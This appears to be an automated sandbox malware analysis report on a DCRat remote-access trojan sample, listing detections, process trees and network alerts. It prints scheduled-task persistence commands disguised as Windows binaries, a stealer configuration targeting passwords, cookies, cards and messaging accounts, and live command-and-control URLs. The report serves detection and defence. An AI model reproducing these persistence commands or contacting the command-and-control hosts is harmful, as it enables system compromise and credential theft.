Windows Analysis Report
dmhu7oz5yP.exe

Overview

General Information

Sample name: dmhu7oz5yP.exe (renamed because original name is a hash value)
Original sample name: ED9312F79BD3E7F4BEB41E56EA82512E.exe
Analysis ID: 1502160
MD5: ed9312f79bd3e7f4beb41e56ea82512e
SHA1: 213d531f2ca1543ecc1af3ad2b7fe56b4b027bfe
SHA256: 786b9891bc5ca12d44f2df1a978f675693647eaed50da66b92bdbd3c290bca88
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • dmhu7oz5yP.exe (PID: 7296 cmdline: "C:\Users\user\Desktop\dmhu7oz5yP.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
    • schtasks.exe (PID: 7352 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7368 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7384 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7400 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7416 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7432 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7448 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7464 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7496 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7512 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7528 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7544 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7560 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7576 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7612 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7640 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7672 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7712 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7736 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7760 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7808 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7828 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7848 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7872 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7896 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7912 cmdline: schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7940 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\WinStore.App.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7984 cmdline: schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 10 /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 8104 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • fontdrvhost.exe (PID: 7584 cmdline: "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • fontdrvhost.exe (PID: 7604 cmdline: "C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • jnTUlYyDyuybgXdgxhTkT.exe (PID: 7632 cmdline: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • jnTUlYyDyuybgXdgxhTkT.exe (PID: 7664 cmdline: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • RuntimeBroker.exe (PID: 7688 cmdline: C:\Users\Public\Libraries\RuntimeBroker.exe MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • RuntimeBroker.exe (PID: 7720 cmdline: C:\Users\Public\Libraries\RuntimeBroker.exe MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • upfc.exe (PID: 3524 cmdline: "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • upfc.exe (PID: 5600 cmdline: "C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe" MD5: ED9312F79BD3E7F4BEB41E56EA82512E)
  • cleanup
{"SCRT": "{\"L\":\"^\",\"S\":\"!\",\"U\":\"*\",\"3\":\" \",\"=\":\"#\",\"p\":\"%\",\"Z\":\")\",\"h\":\"@\",\"I\":\">\",\"Y\":\";\",\"9\":\",\",\"d\":\"$\",\"P\":\"-\",\"0\":\"(\",\"l\":\"~\",\"J\":\"|\",\"2\":\".\",\"V\":\"_\",\"w\":\"`\",\"y\":\"<\",\"Q\":\"&\"}", "PCRT": "{\"S\":\"#\",\"I\":\"_\",\"6\":\"|\",\"w\":\"~\",\"Q\":\"<\",\"j\":\")\",\"M\":\"@\",\"f\":\"^\",\"y\":\"&\",\"X\":\"`\",\"=\":\"$\",\"b\":\"(\",\"e\":\"!\",\"0\":\"*\",\"c\":\",\",\"x\":\" \",\"p\":\">\",\"D\":\"%\",\"i\":\";\",\"l\":\"-\"}", "TAG": "", "MUTEX": "DCR_MUTEX-6XDJ2LvIT83i7tWOhrAy", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://mioww.uebki.one/@==gbJBzYuFDT", "H2": "http://mioww.uebki.one/@==gbJBzYuFDT", "T": "0"}
Source | Rule | Description | Author | Strings
dmhu7oz5yP.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
dmhu7oz5yP.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
dmhu7oz5yP.exe | MALWARE_Win_DCRat | DCRat payload | ditekSHen
  • 0x41f28:$x2: DCRat-Log#
  • 0x40a36:$x3: DCRat.Code
  • 0x4025a:$v1: Plugin couldn't process this action!
  • 0x402a4:$v2: Unknown command!
  • 0x41f86:$v4: Saving log...
  • 0x41fa2:$v5: ~Work.log
  • 0x4127d:$v8: %SystemDrive% - Slow
  • 0x412a7:$v9: %UsersFolder% - Fast
  • 0x412d1:$v10: %AppData% - Very Fast

Source | Rule | Description | Author | Strings
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe | MALWARE_Win_DCRat | DCRat payload | ditekSHen
  • 0x41f28:$x2: DCRat-Log#
  • 0x40a36:$x3: DCRat.Code
  • 0x4025a:$v1: Plugin couldn't process this action!
  • 0x402a4:$v2: Unknown command!
  • 0x41f86:$v4: Saving log...
  • 0x41fa2:$v5: ~Work.log
  • 0x4127d:$v8: %SystemDrive% - Slow
  • 0x412a7:$v9: %UsersFolder% - Fast
  • 0x412d1:$v10: %AppData% - Very Fast
C:\Users\Default\RuntimeBroker.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
C:\Users\Default\RuntimeBroker.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

Source | Rule | Description | Author | Strings
00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_3 | Yara detected DCRat | Joe Security
00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_3 | Yara detected DCRat | Joe Security
00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_3 | Yara detected DCRat | Joe Security
00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_3 | Yara detected DCRat | Joe Security
00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_3 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author | Strings
0.0.dmhu7oz5yP.exe.2b0000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0.0.dmhu7oz5yP.exe.2b0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.dmhu7oz5yP.exe.2b0000.0.unpack | MALWARE_Win_DCRat | DCRat payload | ditekSHen
  • 0x41f28:$x2: DCRat-Log#
  • 0x40a36:$x3: DCRat.Code
  • 0x4025a:$v1: Plugin couldn't process this action!
  • 0x402a4:$v2: Unknown command!
  • 0x41f86:$v4: Saving log...
  • 0x41fa2:$v5: ~Work.log
  • 0x4127d:$v8: %SystemDrive% - Slow
  • 0x412a7:$v9: %UsersFolder% - Fast
  • 0x412d1:$v10: %AppData% - Very Fast

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Libraries\RuntimeBroker.exe, CommandLine: C:\Users\Public\Libraries\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\RuntimeBroker.exe, NewProcessName: C:\Users\Public\Libraries\RuntimeBroker.exe, OriginalFileName: C:\Users\Public\Libraries\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Libraries\RuntimeBroker.exe, ProcessId: 7688, ProcessName: RuntimeBroker.exe
Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\dmhu7oz5yP.exe, ProcessId: 7296, TargetFilename: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: C:\Users\Public\Libraries\RuntimeBroker.exe, CommandLine: C:\Users\Public\Libraries\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\RuntimeBroker.exe, NewProcessName: C:\Users\Public\Libraries\RuntimeBroker.exe, OriginalFileName: C:\Users\Public\Libraries\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Libraries\RuntimeBroker.exe, ProcessId: 7688, ProcessName: RuntimeBroker.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\dmhu7oz5yP.exe", ParentImage: C:\Users\user\Desktop\dmhu7oz5yP.exe, ParentProcessId: 7296, ParentProcessName: dmhu7oz5yP.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f, ProcessId: 7544, ProcessName: schtasks.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\dmhu7oz5yP.exe", ParentImage: C:\Users\user\Desktop\dmhu7oz5yP.exe, ParentProcessId: 7296, ParentProcessName: dmhu7oz5yP.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f, ProcessId: 7496, ProcessName: schtasks.exe

Timestamp: 2024-08-31T10:15:43.077373+0200
SID: 2850862
Severity: 1
Source Port: 80
Destination Port: 49778
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-08-31T10:14:16.499938+0200
SID: 2850862
Severity: 1
Source Port: 80
Destination Port: 49763
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-08-31T10:11:57.441180+0200
SID: 2034194
Severity: 1
Source Port: 49730
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: dmhu7oz5yP.exe; Avira: detected
Source: http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB; Avira URL Cloud: Label: malware
Source: http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZ; Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe; Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe; Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe; Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Users\Default\RuntimeBroker.exe; Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe; Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Users\Default\RuntimeBroker.exe; Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe; Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Windows\Media\WinStore.App.exe; Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe; Avira: detection malicious, Label: HEUR/AGEN.1310064
Source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack; Malware Configuration Extractor: DCRat {"SCRT": "{\"L\":\"^\",\"S\":\"!\",\"U\":\"*\",\"3\":\" \",\"=\":\"#\",\"p\":\"%\",\"Z\":\")\",\"h\":\"@\",\"I\":\">\",\"Y\":\";\",\"9\":\",\",\"d\":\"$\",\"P\":\"-\",\"0\":\"(\",\"l\":\"~\",\"J\":\"|\",\"2\":\".\",\"V\":\"_\",\"w\":\"`\",\"y\":\"<\",\"Q\":\"&\"}", "PCRT": "{\"S\":\"#\",\"I\":\"_\",\"6\":\"|\",\"w\":\"~\",\"Q\":\"<\",\"j\":\")\",\"M\":\"@\",\"f\":\"^\",\"y\":\"&\",\"X\":\"`\",\"=\":\"$\",\"b\":\"(\",\"e\":\"!\",\"0\":\"*\",\"c\":\",\",\"x\":\" \",\"p\":\">\",\"D\":\"%\",\"i\":\";\",\"l\":\"-\"}", "TAG": "", "MUTEX": "DCR_MUTEX-6XDJ2LvIT83i7tWOhrAy", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://mioww.uebki.one/@==gbJBzYuFDT", "H2": "http://mioww.uebki.one/@==gbJBzYuFDT", "T": "0"}
Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe; ReversingLabs: Detection: 78%
Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe; ReversingLabs: Detection: 78%
Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe; ReversingLabs: Detection: 78%
Source: C:\Users\Default\RuntimeBroker.exe; ReversingLabs: Detection: 78%
Source: C:\Users\Public\Libraries\RuntimeBroker.exe; ReversingLabs: Detection: 78%
Source: C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe; ReversingLabs: Detection: 78%
Source: C:\Windows\Media\WinStore.App.exe; ReversingLabs: Detection: 78%
Source: C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe; ReversingLabs: Detection: 78%
Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe; ReversingLabs: Detection: 78%
Source: dmhu7oz5yP.exe; ReversingLabs: Detection: 78%
Source: dmhu7oz5yP.exe; Virustotal: Detection: 80%
Source: Submited Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe; Joe Sandbox ML: detected
Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe; Joe Sandbox ML: detected
Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe; Joe Sandbox ML: detected
Source: C:\Users\Default\RuntimeBroker.exe; Joe Sandbox ML: detected
Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe; Joe Sandbox ML: detected
Source: C:\Users\Default\RuntimeBroker.exe; Joe Sandbox ML: detected
Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe; Joe Sandbox ML: detected
Source: C:\Windows\Media\WinStore.App.exe; Joe Sandbox ML: detected
Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe; Joe Sandbox ML: detected
Source: dmhu7oz5yP.exe; Joe Sandbox ML: detected
Source: dmhu7oz5yP.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\dmhu7oz5yP.exe; Directory created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
Source: C:\Users\user\Desktop\dmhu7oz5yP.exe; Directory created: C:\Program Files\Windows NT\TableTextService\en-US\5b884080fd4f94
Source: dmhu7oz5yP.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\dmhu7oz5yP.exe; File opened: C:\Users\user
Source: C:\Users\user\Desktop\dmhu7oz5yP.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\dmhu7oz5yP.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\dmhu7oz5yP.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\dmhu7oz5yP.exe; File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\dmhu7oz5yP.exe; File opened: C:\Users\user\AppData\Local
Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe; Code function: 4x nop then jmp 00007FFD9B8B06D1h; 19_2_00007FFD9B8B03E1
Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe; Code function: 4x nop then jmp 00007FFD9B8B2E6Dh; 19_2_00007FFD9B8B2C4C
Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe; Code function: 4x nop then jmp 00007FFD9B8A8834h; 19_2_00007FFD9B8A831D
Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe; Code function: 4x nop then jmp 00007FFD9B89C164h; 19_2_00007FFD9B89B9E0
Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe; Code function: 4x nop then jmp 00007FFD9B8B3F99h; 19_2_00007FFD9B8B3F77
Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe; Code function: 4x nop then jmp 00007FFD9B8B2942h; 19_2_00007FFD9B8B27CC

Networking

Source: Network traffic; Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49730 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 188.114.97.3:80 -> 192.168.2.4:49763
Source: Network traffic; Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 188.114.97.3:80 -> 192.168.2.4:49778
Source: Malware configuration extractor; URLs: http://mioww.uebki.one/@==gbJBzYuFDT
Source: Yara match; File source: dmhu7oz5yP.exe, type: SAMPLE
Source: Yara match; File source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, type: DROPPED
Source: Yara match; File source: C:\Users\Default\RuntimeBroker.exe, type: DROPPED
